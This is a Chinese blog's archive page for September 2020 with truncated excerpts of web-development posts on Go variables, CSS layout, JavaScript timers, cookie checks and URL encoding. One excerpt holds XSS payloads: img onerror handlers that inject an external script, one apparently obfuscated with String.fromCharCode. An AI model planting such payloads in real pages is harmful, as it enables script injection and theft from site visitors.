09 2020 档案

摘要:var a string = "Runoob" //字符串var b, c int = 1, 2 //多变量var count int = 0 //整型 var arry1 [50000]string //数组 无参数返回值func f1(){ } 带参数func f1(arry1 []string 阅读全文
posted @ 2020-09-25 15:44 enych 阅读(948) 评论(0) 推荐(0) 编辑
摘要:bottom: 40px; height: calc(100% - 90px); 控制图片居中 font-family: Arial, sans-serif; font-size: 16px; background-color: rgba(51, 51, 51, 0.95); height: 100 阅读全文
posted @ 2020-09-24 09:17 enych 阅读(635) 评论(0) 推荐(0) 编辑
摘要:Test 阅读全文
posted @ 2020-09-17 17:38 enych 阅读(108) 评论(0) 推荐(0) 编辑
摘要:function jt() { //显示 var zw = document.getElementById('s2id_txtCounterName'); if (zw == null) { setTimeout(function () { jt(); }, 30); return; } var z 阅读全文
posted @ 2020-09-12 14:34 enych 阅读(186) 评论(0) 推荐(0) 编辑
摘要:var qad = getCookie("qqq"); if (qad==null) { //跳转代码 setTimeout(function(){ alert("登陆过期,请重新登陆!"); parent.document.writeln("<iframe style=\"margin:0px;p 阅读全文
posted @ 2020-09-10 08:59 enych 阅读(190) 评论(0) 推荐(0) 编辑
摘要:<img src=x onerror=with(document)body.appendChild(document.createElement('script')).src="domain.js"></img> <img src="#" onerror="var a=String.fromChar 阅读全文
posted @ 2020-09-10 08:43 enych 阅读(5922) 评论(0) 推荐(0) 编辑
摘要:转自: https://blog.csdn.net/qq_40717869/article/details/81749970 1.用fixed定位来解决 解决思路:这个就是把html,body设置width: 100%; height: 100%; position: fixed;top:0;lef 阅读全文
posted @ 2020-09-04 20:08 enych 阅读(1372) 评论(0) 推荐(0) 编辑
摘要:encodeURIComponent('\n') "%0A" encodeURIComponent('\\') "%5C" encodeURIComponent('/') "%2F" encodeURIComponent(',') "%2C" encodeURIComponent('\'') %27 阅读全文
posted @ 2020-09-03 17:43 enych 阅读(998) 评论(0) 推荐(0) 编辑

点击右上角即可分享
微信分享提示